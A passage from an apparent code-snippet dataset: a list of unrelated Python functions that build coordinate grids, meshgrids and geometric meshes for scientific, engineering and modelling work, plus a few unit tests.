range(n_groups):\n lonseg = self._lon[group_start:group_ends[i]]\n latseg = self._lat[group_start:group_ends[i]]\n depthseg = self._depth[group_start:group_ends[i]]\n\n # Each group can have many contiguous quadrilaterals defined in it\n # separations (nans) between segments mean that segments are not\n # contiguous.\n\n npoints = len(lonseg)\n nquads = int((npoints - 4) / 2) + 1\n quad_start = 0\n quad_end = -1\n for j in range(nquads):\n P0 = Point(lonseg[quad_start],\n latseg[quad_start],\n depthseg[quad_start])\n P1 = Point(lonseg[quad_start + 1],\n latseg[quad_start + 1],\n depthseg[quad_start + 1])\n P2 = Point(lonseg[quad_end - 1],\n latseg[quad_end - 1],\n depthseg[quad_end - 1])\n P3 = Point(lonseg[quad_end],\n latseg[quad_end],\n depthseg[quad_end])\n quad = [P0, P1, P2, P3]\n\n # Enforce plane by moving P2 -- already close because of check\n # in read_rupture_file/is_quadrupture_class/is_quad\n\n dummy, fixed_quad = is_quad(quad)\n\n # Reverse quad if necessary\n fixed_quad = self._fixStrikeDirection(fixed_quad)\n\n self._quadrilaterals.append(fixed_quad)\n\n quad_start = quad_start + 1\n quad_end = quad_end - 1\n\n group_start = group_ends[i] + 1\n self._group_index.extend([groupind] * nquads)\n groupind = groupind + 1", "def grid_coordinates(r, xlim, ylim, shape='square'):\n if shape == 'square':\n dx = r\n dy = 
r\n if shape == 'hexagonal':\n dx = r\n dy = np.sqrt(3)*dx/2.\n x = np.arange(xlim[0], xlim[1], dx)\n y = np.arange(ylim[0], ylim[1], dy)\n X, Y = np.meshgrid(x, y)\n if shape == 'hexagonal':\n X[::2] = X[::2] + dx/2.\n\n return X.flatten(), Y.flatten()", "def _build_grid(self):\n n = self.params['n']\n\n x_min, x_max = min(self.node[:, 0]), max(self.node[:, 0])\n y_min, y_max = min(self.node[:, 1]), max(self.node[:, 1])\n xv = np.linspace(x_min, x_max, num=n, endpoint=True)\n yv = np.linspace(y_min, y_max, num=n, endpoint=True)\n xg, yg = np.meshgrid(xv, yv, sparse=False, indexing='xy')\n\n return xg, yg", "def get_quad_mesh(q, dx):\n P0, P1, P2, P3 = q\n p0 = Vector.fromPoint(P0) # fromPoint converts to ECEF\n p1 = Vector.fromPoint(P1)\n p2 = Vector.fromPoint(P2)\n p3 = Vector.fromPoint(P3)\n\n # Get nx based on length of top edge, minimum allowed is 2\n toplen_km = get_quad_length(q)\n nx = int(np.max([round(toplen_km / dx, 0) + 1, 2]))\n\n # Get array of points along top and bottom edges\n xfac = np.linspace(0, 1, nx)\n topp = [p0 + (p1 - p0) * a for a in xfac]\n botp = [p3 + (p2 - p3) * a for a in xfac]\n\n # Get ny based on mean length of vectors connecting top and bottom points\n ylen_km = np.ones(nx)\n for i in range(nx):\n ylen_km[i] = (topp[i] - botp[i]).mag() / 1000\n ny = int(np.max([round(np.mean(ylen_km) / dx, 0) + 1, 2]))\n yfac = np.linspace(0, 1, ny)\n\n # Build mesh: dict of ny by nx arrays (x, y, z):\n mesh = {'x': np.zeros([ny, nx]), 'y': np.zeros(\n [ny, nx]), 'z': np.zeros([ny, nx])}\n for i in range(nx):\n mpts = [topp[i] + (botp[i] - topp[i]) * a for a in yfac]\n mesh['x'][:, i] = [a.x for a in mpts]\n mesh['y'][:, i] = [a.y for a in mpts]\n mesh['z'][:, i] = [a.z for a in mpts]\n\n # Make arrays of pixel corners\n mesh['llx'] = mesh['x'][1:, 0:-1]\n mesh['lrx'] = mesh['x'][1:, 1:]\n mesh['ulx'] = mesh['x'][0:-1, 0:-1]\n mesh['urx'] = mesh['x'][0:-1, 1:]\n mesh['lly'] = mesh['y'][1:, 0:-1]\n mesh['lry'] = mesh['y'][1:, 1:]\n mesh['uly'] = mesh['y'][0:-1, 0:-1]\n mesh['ury'] = mesh['y'][0:-1, 1:]\n mesh['llz'] = mesh['z'][1:, 0:-1]\n mesh['lrz'] = mesh['z'][1:, 1:]\n mesh['ulz'] = mesh['z'][0:-1, 0:-1]\n mesh['urz'] = mesh['z'][0:-1, 1:]\n mesh['cpx'] = np.zeros_like(mesh['llx'])\n mesh['cpy'] = np.zeros_like(mesh['llx'])\n mesh['cpz'] = np.zeros_like(mesh['llx'])\n\n # i and j are indices over subruptures\n ni, nj = mesh['llx'].shape\n for i in range(0, ni):\n for j in range(0, nj):\n # Rupture corner points\n pp0 = Vector(\n mesh['ulx'][i, j], mesh['uly'][i, j], mesh['ulz'][i, j])\n pp1 = Vector(\n mesh['urx'][i, j], mesh['ury'][i, j], mesh['urz'][i, j])\n pp2 = Vector(\n mesh['lrx'][i, j], mesh['lry'][i, j], mesh['lrz'][i, j])\n pp3 = Vector(\n mesh['llx'][i, j], mesh['lly'][i, j], mesh['llz'][i, j])\n # Find center of quad\n mp0 = pp0 + (pp1 - pp0) * 0.5\n mp1 = pp3 + (pp2 - pp3) * 0.5\n cp = mp0 + (mp1 - mp0) * 0.5\n mesh['cpx'][i, j] = cp.x\n mesh['cpy'][i, j] = cp.y\n mesh['cpz'][i, j] = cp.z\n return mesh", "def make_xy_grid(samples_x, samples_y=None, radius=1):\n if samples_y is None:\n samples_y = samples_x\n x = e.linspace(-radius, radius, samples_x, dtype=config.precision)\n y = e.linspace(-radius, radius, samples_y, dtype=config.precision)\n xx, yy = e.meshgrid(x, y)\n return xx, yy", "def _TwoDMeshGrid(self, num_points, lattice_sizes, input_dims):\n if input_dims != 2:\n raise ValueError(\"2-d mesh grid is possible only for 2-d lattice. 
Lattice\"\n \" dimension given: %s\" % input_dims)\n return test_utils.two_dim_mesh_grid(\n num_points=num_points,\n x_min=0.0,\n y_min=0.0,\n x_max=lattice_sizes - 1.0,\n y_max=lattice_sizes - 1.0)", "def create_grids(self):\n \n par = self.par\n\n # a. retirement\n \n # pre-decision states\n par.grid_m_ret = nonlinspace(par.eps,par.m_max_ret,par.Nm_ret,par.phi_m)\n par.Nmcon_ret = par.Nm_ret - par.Na_ret\n \n # post-decision states\n par.grid_a_ret = nonlinspace(0,par.a_max_ret,par.Na_ret,par.phi_m)\n \n # b. working: state space (m,n,k) \n par.grid_m = nonlinspace(par.eps,par.m_max,par.Nm,par.phi_m)\n\n par.Nn = par.Nm\n par.n_max = par.m_max + par.n_add\n par.grid_n = nonlinspace(0,par.n_max,par.Nn,par.phi_n)\n\n par.grid_n_nd, par.grid_m_nd = np.meshgrid(par.grid_n,par.grid_m,indexing='ij')\n\n # c. working: w interpolant (and wa and wb and wq)\n par.Na_pd = np.int_(np.floor(par.pd_fac*par.Nm))\n par.a_max = par.m_max + par.a_add\n par.grid_a_pd = nonlinspace(0,par.a_max,par.Na_pd,par.phi_m)\n \n par.Nb_pd = np.int_(np.floor(par.pd_fac*par.Nn))\n par.b_max = par.n_max + par.b_add\n par.grid_b_pd = nonlinspace(0,par.b_max,par.Nb_pd,par.phi_n)\n \n par.grid_b_pd_nd, par.grid_a_pd_nd = np.meshgrid(par.grid_b_pd,par.grid_a_pd,indexing='ij')\n \n # d. working: egm (seperate grids for each segment)\n \n if par.solmethod == 'G2EGM':\n\n # i. dcon\n par.d_dcon = np.zeros((par.Na_pd,par.Nb_pd),dtype=np.float_,order='C')\n \n # ii. acon\n par.Nc_acon = np.int_(np.floor(par.Na_pd*par.acon_fac))\n par.Nb_acon = np.int_(np.floor(par.Nb_pd*par.acon_fac))\n par.grid_b_acon = nonlinspace(0,par.b_max,par.Nb_acon,par.phi_n)\n par.a_acon = np.zeros(par.grid_b_acon.shape)\n par.b_acon = par.grid_b_acon\n\n # iii. con\n par.Nc_con = np.int_(np.floor(par.Na_pd*par.con_fac))\n par.Nb_con = np.int_(np.floor(par.Nb_pd*par.con_fac))\n \n par.grid_c_con = nonlinspace(par.eps,par.m_max,par.Nc_con,par.phi_m)\n par.grid_b_con = nonlinspace(0,par.b_max,par.Nb_con,par.phi_n)\n\n par.b_con,par.c_con = np.meshgrid(par.grid_b_con,par.grid_c_con,indexing='ij')\n par.a_con = np.zeros(par.c_con.shape)\n par.d_con = np.zeros(par.c_con.shape)\n \n elif par.solmethod == 'NEGM':\n\n par.grid_l = par.grid_m\n\n # e. shocks\n assert (par.Neta == 1 and par.var_eta == 0) or (par.Neta > 1 and par.var_eta > 0)\n\n if par.Neta > 1:\n par.eta,par.w_eta = log_normal_gauss_hermite(np.sqrt(par.var_eta), par.Neta)\n else:\n par.eta = np.ones(1)\n par.w_eta = np.ones(1)\n\n # f. 
timings\n par.time_work = np.zeros(par.T)\n par.time_w = np.zeros(par.T)\n par.time_egm = np.zeros(par.T)\n par.time_vfi = np.zeros(par.T)", "def xy_mesh(nx, ny, x_min=0, x_max=1, y_min=0, y_max=1):\n\n\tx = np.linspace(x_min, x_max, nx)\n\ty = np.linspace(y_min, y_max, ny)\n\txv, yv = np.meshgrid(x, y)\n\t\n\treturn xv, yv", "def mesh(self):\n return numpy.meshgrid(*self.edges, indexing='ij')", "def make_grid(x1_points, **kwargs):\n x2_points = kwargs.pop('x2_points', x1_points)\n x1min = kwargs.pop('x1min', 0.0)\n x1max = kwargs.pop('x1max', 1.0)\n x2min = kwargs.pop('x2min', 0.0)\n x2max = kwargs.pop('x2max', 1.0)\n if kwargs:\n raise TypeError('Unexpected **kwargs: {0}'.format(kwargs))\n x1_setup = np.linspace(x1min, x1max, num=x1_points)\n # flip x2 order to have y increacing on plots' verticle axis\n x2_setup = np.linspace(x2min, x2max, num=x2_points)[::-1]\n x1_grid, x2_grid = np.meshgrid(x1_setup, x2_setup)\n return x1_grid, x2_grid", "def meshgrid(self):\n vecs = self.coord_vecs\n return np.meshgrid(*vecs, indexing='ij')", "def _create_input_grid(self, x1, x2):\n return x1.unsqueeze(-2), x2.unsqueeze(-3)", "def test_quadrature_grid(self):\n L = 2\n M = 2\n N = 0\n NFP = 1\n\n grid_quad = QuadratureGrid(L, M, N, NFP)\n\n roots, weights = special.js_roots(3, 2, 2)\n\n quadrature_nodes = np.stack(\n [\n np.array([roots[0]] * 5 + [roots[1]] * 5 + [roots[2]] * 5),\n np.array(\n [0, 2 * np.pi / 5, 4 * np.pi / 5, 6 * np.pi / 5, 8 * np.pi / 5] * 3\n ),\n np.zeros(15),\n ]\n ).T\n\n np.testing.assert_allclose(grid_quad.spacing.prod(axis=1), grid_quad.weights)\n np.testing.assert_allclose(grid_quad.nodes, quadrature_nodes)", "def makemesh_regular(data,vecs,grid):\n\tdata = beyonder(data,vecs,growsize=0.1)\n\txypts = np.array([[i,j] for i in np.linspace(0,vecs[0],grid[0].astype(int)) \n\t\tfor j in np.linspace(0,vecs[1],grid[1].astype(int))])\n\tinterp = scipy.interpolate.LinearNDInterpolator(data[:,0:2],data[:,2],fill_value=0.0)\n\tbilinear_pts = np.array([[i[0],i[1],interp(i[0],i[1])] for i in xypts])\n\tresult = scipy.interpolate.griddata(bilinear_pts[:,0:2],bilinear_pts[:,2],bilinear_pts[:,0:2],\n\t\tmethod='cubic')\n\t#---observed that griddata returns points where we cycle through the points in the following\n\t#---...order:x0,y0),(x0,y1),...(x0,yn),(x1,y0),... 
and so on, suggesting that the following \n\t#---...reshape command (which reshape function claims to use the \"C\" programming language convention\n\t#---...for reshaping objects by default, which convention has the last index changing \"fastest\")\n\txyz_pts = np.array([[bilinear_pts[i,0],bilinear_pts[i,1],result[i]] for i in range(len(result))])\n\treturn np.reshape(xyz_pts[:,2],grid.astype(int))", "def square_mesh(N):\n xs,ys = np.meshgrid(np.linspace(0,1,N),np.linspace(0,1,N))\n xs = xs.flatten(1)\n ys = ys.flatten(1)\n _,_,t,_ = triang.delaunay(xs,ys)\n p = np.vstack((xs,ys)).T\n\n return Trimesh(p,t)", "def make_cartesian(self, grid, axis='z'):\n if grid.shape != self.shape:\n raise NotImplementedError('make_cartesian: grid shape mismatch'\n ' not supported')\n gt_flat = grid.t.flat\n r_flat = self.r.flat\n t_flat = self.t.flat\n\n if axis == 'z':\n self.x = self.r.copy()\n self.y = self.r.copy()\n x_flat = self.x.flat\n y_flat = self.y.flat\n for i in range(self.r.size):\n gt = gt_flat[i]\n sine = sin(gt)\n cosine = cos(gt)\n r = r_flat[i]\n t = t_flat[i]\n x_flat[i] = r*cosine - t*sine\n y_flat[i] = r*sine + t*cosine\n self.r = None\n self.t = None\n\n elif axis == 'x':\n self.x = self.z\n self.y = self.r.copy()\n self.z = self.r.copy()\n y_flat = self.y.flat\n z_flat = self.z.flat\n for i in range(self.r.size):\n gt = gt_flat[i]\n sine = sin(gt)\n cosine = cos(gt)\n r = r_flat[i]\n t = t_flat[i]\n y_flat[i] = r*cosine - t*sine\n z_flat[i] = r*sine + t*cosine\n self.r = None\n self.t = None\n\n else:\n raise ValueError(\"axis must be 'z' or 'x'\")", "def meshgrid(i, j, indexing='ij'):\n if K.ndim(i) != 1 or K.ndim(j) != 1:\n raise ValueError('need ndim() == 1')\n if K.backend() == 'tensorflow':\n import tensorflow as tf\n I, J = tf.meshgrid(i, j, indexing=indexing)\n else:\n assert K.backend() == 'theano'\n from theano import tensor as T\n I = T.repeat(i, K.shape(j)[0])\n J = T.tile(j, K.shape(i)[0])\n shape = (K.shape(i)[0], K.shape(j)[0])\n return K.reshape(I, shape), K.reshape(J, shape)", "def meshup(self, ind='ij'):\r\n xv, yv, zv = self.vec()\r\n x_reg, y_reg, z_reg = np.meshgrid(xv, yv, zv, indexing=ind)\r\n\r\n return x_reg, y_reg, z_reg", "def to_mesh(\n self,\n lims_x: array_like = (-1, 1),\n lims_y: array_like = (-1, 1),\n ) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n a, b, c, d = self.cartesian()\n x_center, y_center = self.point[:2]\n\n values_x = x_center + lims_x\n values_y = y_center + lims_y\n\n X, Y = np.meshgrid(values_x, values_y)\n\n if c != 0:\n Z = -(a * X + b * Y + d) / c\n\n elif b != 0:\n Z = -(a * X + c * Y + d) / b\n X, Y, Z = X, Z, Y\n\n else:\n Z = -(b * X + c * Y + d) / a\n X, Y, Z = Z, X, Y\n\n return X, Y, Z", "def get_2d_cartesian_grid(num_pts_1d, ranges):\n # from math_tools_cpp import cartesian_product_double as cartesian_product\n from PyDakota.math_tools import cartesian_product\n x1 = np.linspace(ranges[0], ranges[1], num_pts_1d)\n x2 = np.linspace(ranges[2], ranges[3], num_pts_1d)\n abscissa_1d = []\n abscissa_1d.append(x1)\n abscissa_1d.append(x2)\n grid = cartesian_product(abscissa_1d, 1)\n return grid", "def grid(x, y):\n return product(xrange(1, x+1), xrange(1, y+1))", "def build_planar_mesh(cellWidth, x, y, geom_points, geom_edges,\n out_filename='base_mesh.nc', logger=None):\n\n with LoggingContext(__name__, logger=logger) as logger:\n\n da = xarray.DataArray(cellWidth,\n dims=['y', 'x'],\n coords={'y': y, 'x': x},\n name='cellWidth')\n cw_filename = 'cellWidthVsXY.nc'\n da.to_netcdf(cw_filename)\n\n logger.info('Step 1. 
Generate mesh with JIGSAW')\n jigsaw_driver(cellWidth, x, y, on_sphere=False,\n geom_points=geom_points, geom_edges=geom_edges,\n logger=logger)\n\n logger.info('Step 2. Convert triangles from jigsaw format to netcdf')\n jigsaw_to_netcdf(msh_filename='mesh-MESH.msh',\n output_name='mesh_triangles.nc', on_sphere=False)\n\n logger.info('Step 3. Convert from triangles to MPAS mesh')\n args = ['MpasMeshConverter.x',\n 'mesh_triangles.nc',\n out_filename]\n check_call(args=args, logger=logger)", "def makegridnd(meshsize, dimension):\n x = np.meshgrid(*[np.linspace(MIN_POINT_PRECISION, 1,meshsize) for d in range(dimension)])\n mesh = np.asarray(x)\n total = np.sum(mesh,axis=0)\n plane_mesh = mesh[:,np.isclose(total,1.0,atol=1e-2)]\n\n return plane_mesh", "def meshup2d(self, ind='ij'):\r\n\r\n xv, yv, _ = self.vec()\r\n x_reg, y_reg = np.meshgrid(xv, yv, indexing=ind)\r\n\r\n return x_reg, y_reg", "def create_local_grid(points: np.ndarray, edge_sides: dict, triangles: np.ndarray,\n fault_is_plane: bool, resolution: float=5000.0, num_search_tris: int=10):\n\n # Edge coordinates.\n left_edge = edge_sides['left_edge']\n right_edge = edge_sides['right_edge']\n bottom_edge = edge_sides['bottom_edge']\n top_edge = edge_sides['top_edge']\n\n # Determine number of points in each direction.\n left_diffs = np.diff(left_edge, axis=0)\n left_length = np.sum(np.linalg.norm(left_diffs, axis=1))\n num_divs_left = left_length/resolution\n\n right_diffs = np.diff(right_edge, axis=0)\n right_length = np.sum(np.linalg.norm(right_diffs, axis=1))\n num_divs_right = right_length/resolution\n\n num_vert_points = int(round(0.5*(num_divs_left + num_divs_right))) + 1\n\n bottom_diffs = np.diff(bottom_edge, axis=0)\n bottom_length = np.sum(np.linalg.norm(bottom_diffs, axis=1))\n num_divs_bottom = bottom_length/resolution\n\n top_diffs = np.diff(top_edge, axis=0)\n top_length = np.sum(np.linalg.norm(top_diffs, axis=1))\n num_divs_top = top_length/resolution\n\n num_horiz_points = int(round(0.5*(num_divs_bottom + num_divs_top))) + 1\n num_points = num_vert_points*num_horiz_points\n\n # Get interpolated points on edges.\n ygrid_left = np.linspace(left_edge[0,1], left_edge[-1,1], num=num_vert_points, dtype=np.float64)\n xgrid_left = np.interp(ygrid_left, left_edge[:,1], left_edge[:,0])\n zgrid_left = np.interp(ygrid_left, left_edge[:,1], left_edge[:,2])\n ygrid_right = np.linspace(right_edge[0,1], right_edge[-1,1], num=num_vert_points, dtype=np.float64)\n xgrid_right = np.interp(ygrid_right, right_edge[:,1], right_edge[:,0])\n zgrid_right = np.interp(ygrid_right, right_edge[:,1], right_edge[:,2])\n xgrid_bottom = np.linspace(bottom_edge[0,0], bottom_edge[-1,0], num=num_horiz_points, dtype=np.float64)\n ygrid_bottom = np.interp(xgrid_bottom, bottom_edge[:,0], bottom_edge[:,1])\n zgrid_bottom = np.interp(xgrid_bottom, bottom_edge[:,0], bottom_edge[:,2])\n xgrid_top = np.linspace(top_edge[0,0], top_edge[-1,0], num=num_horiz_points, dtype=np.float64)\n ygrid_top = np.interp(xgrid_top, top_edge[:,0], top_edge[:,1])\n zgrid_top = np.interp(xgrid_top, top_edge[:,0], top_edge[:,2])\n\n # Create 2D mesh.\n mesh_points = np.zeros((num_vert_points, num_horiz_points, 3), dtype=np.float64)\n\n # We need to do this for points on the boundary, which might fall outside a mesh triangle.\n if not(fault_is_plane):\n z = np.zeros((num_vert_points, num_horiz_points), dtype=np.float64)\n is_mesh_edge = np.zeros((num_vert_points, num_horiz_points), dtype=np.bool)\n is_mesh_edge[0,:] = True\n is_mesh_edge[-1,:] = True\n is_mesh_edge[:,0] = True\n 
is_mesh_edge[:,-1] = True\n z[:,0] = zgrid_left\n z[:,-1] = zgrid_right\n z[0,:] = zgrid_bottom\n z[-1,:] = zgrid_top\n \n for row_num in range(num_vert_points):\n mesh_points[row_num,:,0] = np.linspace(xgrid_left[row_num], xgrid_right[row_num],\n num=num_horiz_points, dtype=np.float64)\n for col_num in range(num_horiz_points):\n mesh_points[:,col_num,1] = np.linspace(ygrid_bottom[col_num], ygrid_top[col_num],\n num=num_vert_points, dtype=np.float64)\n\n # If surface is not a plane, interpolate to get z-coordinates.\n mesh_points = mesh_points.reshape(num_points, 3)\n if not(fault_is_plane):\n is_mesh_edge = is_mesh_edge.reshape(num_points)\n z = z.reshape(num_points)\n mesh_points[:,2] = tri_interpolate_zcoords(points, triangles, mesh_points[:,0:2],\n is_mesh_edge, num_search_tris=num_search_tris)\n mesh_points[is_mesh_edge,2] = z[is_mesh_edge]\n\n return (mesh_points, num_horiz_points, num_vert_points)", "def flat_2D_grid(bounds, dx, dy):\n x = np.arange(bounds[0], bounds[1] + dx, dx)\n y = np.arange(bounds[2], bounds[3] + dy, dy)\n x_grid, y_grid = np.meshgrid(x, y)\n x_grid, y_grid = x_grid.flatten(), y_grid.flatten()\n\n return pd.DataFrame({'x': x_grid,\n 'y': y_grid,\n 'masked': np.zeros(x_grid.size, dtype='bool')})", "def QuadrilateralProjection(c1=(0,0), c2=(2,0), c3=(2,2), c4=(0,2), points=None, npoints=10, equally_spaced=True):\n\n if points is None or not isinstance(points,np.ndarray):\n if not isinstance(c1,tuple) or not isinstance(c2,tuple) or not isinstance(c3,tuple) or not isinstance(c4,tuple):\n raise ValueError(\"coordinates should be given in tuples of two elements (x,y)\")\n else:\n c1 = np.array(c1); c2 = np.array(c2); c3 = np.array(c3); c4 = np.array(c4)\n opoints = np.vstack((c1,c2,c3,c4))\n else:\n opoints = points\n\n from Florence.FunctionSpace import Quad, QuadES\n from Florence.QuadratureRules.GaussLobattoPoints import GaussLobattoPointsQuad\n from Florence.QuadratureRules.EquallySpacedPoints import EquallySpacedPoints\n\n npoints = int(npoints)\n if npoints ==0: npoints=1\n\n if equally_spaced:\n points = EquallySpacedPoints(ndim=3,C=npoints-1)\n hpBases = QuadES.Lagrange\n else:\n points = GaussLobattoPointsQuad(npoints-1)\n hpBases = Quad.LagrangeGaussLobatto\n\n BasesQuad = np.zeros((4,points.shape[0]),dtype=np.float64)\n for i in range(points.shape[0]):\n BasesQuad[:,i] = hpBases(0,points[i,0],points[i,1],arrange=1)[:,0]\n\n node_arranger = NodeArrangementQuad(npoints-1)[2]\n\n qmesh = Mesh()\n qmesh.Square(lower_left_point=(-1.,-1.), side_length=2,n=npoints, element_type=\"quad\")\n quads = qmesh.elements\n\n\n nnode = qmesh.nnode\n nelem = qmesh.nelem\n nsize = int((npoints+1)**2)\n\n mesh = Mesh()\n mesh.points = np.dot(BasesQuad.T, opoints)\n\n _, inv = np.unique(quads,return_inverse=True)\n sorter = np.argsort(node_arranger)\n mesh.elements = sorter[inv].reshape(quads.shape)\n\n mesh.element_type=\"quad\"\n mesh.nelem = mesh.elements.shape[0]\n mesh.nnode = mesh.points.shape[0]\n mesh.GetBoundaryEdges()\n\n return mesh", "def get_meshgrid(self, dim: int = 2) -> list:\n if dim != 2:\n raise NotImplementedError\n vectors = [self.get_ticks(ax) for ax in range(dim)]\n vectors.reverse()\n return np.meshgrid(*vectors)", "def cmesh(self):\n return numpy.meshgrid(*self.centers, indexing='ij')", "def create_grid(xlim, ylim, step):\n x_range = np.arange(xlim[0], xlim[1], step)\n y_range = np.arange(ylim[0], ylim[1], step)\n return x_range, y_range", "def get_gridded_parameters(q, xparam=\"x\", yparam=\"y\", zparam=\"z\"):\n plotParamDF = q[ [xparam, yparam, 
zparam] ]\n plotParamDF[xparam] = plotParamDF[xparam].tolist()\n plotParamDF[yparam] = np.round(plotParamDF[yparam].tolist(), 1)\n plotParamDF = plotParamDF.groupby( [xparam, yparam] ).mean().reset_index()\n plotParamDF = plotParamDF[ [xparam, yparam, zparam] ].pivot( xparam, yparam )\n x = plotParamDF.index.values\n y = plotParamDF.columns.levels[1].values\n X, Y = np.meshgrid( x, y )\n # Mask the nan values! pcolormesh can't handle them well!\n Z = np.ma.masked_where(\n np.isnan(plotParamDF[zparam].values),\n plotParamDF[zparam].values)\n return X,Y,Z", "def regrid(xi, yi, zi, xo, yo):\n xi = common.lon180(xi)\n xo = common.lon180(xo)\n\n idx = dict((k, i) for i, k in enumerate(xi))\n selx = [idx[i] for i in xo]\n idy = dict((k, i) for i, k in enumerate(yi))\n sely = [idy[i] for i in yo]\n selX, selY = numpy.meshgrid(selx, sely)\n return zi[selY, selX]", "def makeGrid(self):\n self.h = self.step_x\n self.k = self.step_t\n self.t, self.x = np.meshgrid(np.arange(self.min_t, self.max_t, self.step_t), np.arange(self.min_x, self.max_x\n , self.step_x))", "def define_grid(self):\n self.h_shape = int(\n np.round((self.h_stop - self.h_start) / self.h_step, 2)) + 1\n self.k_shape = int(\n np.round((self.k_stop - self.k_start) / self.k_step, 2)) + 1\n self.l_shape = int(\n np.round((self.l_stop - self.l_start) / self.l_step, 2)) + 1\n self.grid_origin = [self.h_start, self.k_start, self.l_start]\n self.grid_step = [int(np.rint(1.0/self.h_step)),\n int(np.rint(1.0/self.k_step)),\n int(np.rint(1.0/self.l_step))]\n self.grid_shape = [self.h_shape, self.k_shape, self.l_shape]\n self.grid_basis = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]", "def test_get_meshgrid(mock_grid):\n\n windows = [corr_window.CorrWindow(j, 0, WS=127) for j in range(0, 129, 64)]\n mock_grid._array[0] = windows\n windows = [corr_window.CorrWindow(0, i, WS=127) for i in range(0, 193, 64)]\n for ii in range(1, 4):\n mock_grid._array[ii][0] = windows[ii]\n\n expx, expy = np.meshgrid([0, 64, 128], [0, 64, 128, 192])\n actx, acty = mock_grid.get_meshgrid()\n\n assert np.all(actx == expx)\n assert np.all(acty == expy)", "def make_grid(N):\n\n x = np.linspace(-2. , 2 , N)\n y = np.linspace(-2. 
, 2 , N)\n # two evenly spaced grids from -2 to 2\n\n return x, y", "def convert_meshgrid(g, op, block):\n\n inputs = op.input(\"X\")\n x = [g.get_node(i) for i in inputs]\n outs = _op.meshgrid(x, indexing=\"ij\")\n for i, out in enumerate(outs):\n g.add_node(op.output(\"Out\")[i], out)", "def test_Grid_creates_array_space():\n\n # create dummy meshgrid\n img_dim, spacing = (193, 193), 64\n x_vec = np.arange(0, img_dim[1], spacing)\n y_vec = np.arange(0, img_dim[0], spacing)\n xx, yy = np.meshgrid(x_vec, y_vec)\n\n # create Grid\n g = mg.Grid(img_dim, spacing)\n\n assert g.ny == len(y_vec)\n assert g.nx == len(x_vec)", "def meshgridflat(*args, copy=False):\n outputs = np.meshgrid(*args, indexing='ij', copy=copy) # type: Iterable[np.ndarray]\n outputs = [v.flatten() for v in outputs]\n return outputs", "def define_grid():\n grid_left = np.array([[-13.1000000000000, -35.5000000000000, -48.3000000000000, -60, -16.9000000000000,\n -34.8000000000000, -67.5000000000000, -46.1000000000000, -59.8000000000000,\n -14.2000000000000, -28.3000000000000, -42.3000000000000, -67.6000000000000,\n -50.5000000000000, -14.6000000000000, -60.9000000000000, -31.6000000000000,\n -5.10000000000000, -65.6000000000000, -41.8000000000000, -55.1000000000000,\n -22.7000000000000, -5.80000000000000, -49.2000000000000, -34.5000000000000,\n -61.5500000000000, -63.6000000000000, -40.4000000000000, -48.7000000000000,\n -21.8000000000000, -58.2000000000000, -7, -36.3000000000000, -48.1000000000000,\n -56.8000000000000, -7.30000000000000, -22.2000000000000, -36.8000000000000,\n -46.8000000000000],\n [-67.7000000000000, -60, -55.1000000000000, -51.8000000000000, -51.6000000000000,\n -49.3000000000000, -47.1000000000000, -43.7000000000000, -39.6000000000000,\n -39.1000000000000, -31.2000000000000, -30.7000000000000, -30.1000000000000,\n -24.4000000000000, -22.7000000000000, -18.7000000000000, -16.9000000000000,\n -12.6000000000000, -10.8000000000000, -10.2000000000000, -4.01000000000000, 1.20000000000000,\n 2.80000000000000, 3.70000000000000, 3.90000000000000, 6.20000000000000, 8.30000000000000,\n 11.8000000000000, 14.5000000000000, 16, 18.2000000000000, 18.4000000000000, 19.9000000000000,\n 24.6000000000000, 28.5200000000000, 33.8000000000000, 35, 35.4000000000000,\n 35.6000000000000],\n [69.1000000000000, 66, 58.2000000000000, 48, 78, 71.7000000000000, 31, 61.1000000000000,\n 53.3000000000000, 81.1000000000000, 76, 70.2000000000000, 41.2000000000000, 64.4000000000000,\n 80.2000000000000, 50.9000000000000, 75.2000000000000, 77.3000000000000, 37.8000000000000, 67,\n 53.2000000000000, 72, 74.8000000000000, 54.7000000000000, 66.5000000000000, 35.9000000000000,\n 25.7000000000000, 60.7000000000000, 50.5000000000000, 68.9000000000000, 27.3000000000000,\n 70.3000000000000, 59.6000000000000, 44, 20.8000000000000, 61.7000000000000, 57.2000000000000,\n 47, 36]])\n stn_left = np.array([[-14.6, -13.2, -11.7, -9.10, -11.7, -13.2, -7.90, -10],\n [-15.1, -15.1, -15.1, -12.6, -12.6, -12.6, -9.40, -10.1],\n [-5.40, -7.20, -8.70, -8.70, -7.50, -5.10, -10.3, -7.80]])\n grid_right = np.copy(grid_left)\n grid_right[0, :] = grid_right[0, :] * -1\n stn_right = np.copy(stn_left)\n stn_right[0, :] = stn_right[0, :] * -1\n\n return grid_left, grid_right, stn_left, stn_right", "def compute_mesh(nrow, ncol, nele):\n tri_index = np.zeros((nele, 3))\n for i in range(nrow-1):\n for j in range(NUM):\n if j == 0:\n tri_index[i*4*NUM+j*4, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4, 1] = (i+1)\n tri_index[i*4*NUM+j*4, 2] = (i+2)\n\n 
tri_index[i*4*NUM+j*4+1, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4+1, 1] = (i+2)\n tri_index[i*4*NUM+j*4+1, 2] = (i+2)+(2*j+1)*nrow\n else:\n tri_index[i*4*NUM+j*4, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4, 1] = (i+1)+(2*j-1)*nrow\n tri_index[i*4*NUM+j*4, 2] = (i+2)+(2*j-1)*nrow\n\n tri_index[i*4*NUM+j*4+1, 0] = (i+1)+(2*j+1)*nrow\n tri_index[i*4*NUM+j*4+1, 1] = (i+2)+(2*j-1)*nrow\n tri_index[i*4*NUM+j*4+1, 2] = (i+2)+(2*j+1)*nrow\n \n tri_index[i*4*NUM+j*4+2, 0] = (i+1)+2*j*nrow\n tri_index[i*4*NUM+j*4+2, 1] = (i+1)+2*(j+1)*nrow\n tri_index[i*4*NUM+j*4+2, 2] = (i+2)+2*(j+1)*nrow\n\n tri_index[i*4*NUM+j*4+3, 0] = (i+1)+2*j*nrow\n tri_index[i*4*NUM+j*4+3, 1] = (i+2)+2*(j+1)*nrow\n tri_index[i*4*NUM+j*4+3, 2] = (i+2)+2*j*nrow\n return tri_index", "def DoubleCoupleGridRegular(magnitudes=[1.], npts_per_axis=40):\n v = 0.\n w = 0.\n\n kappa = regular(0., 360, npts_per_axis)\n sigma = regular(-90., 90., npts_per_axis)\n h = regular(0., 1., 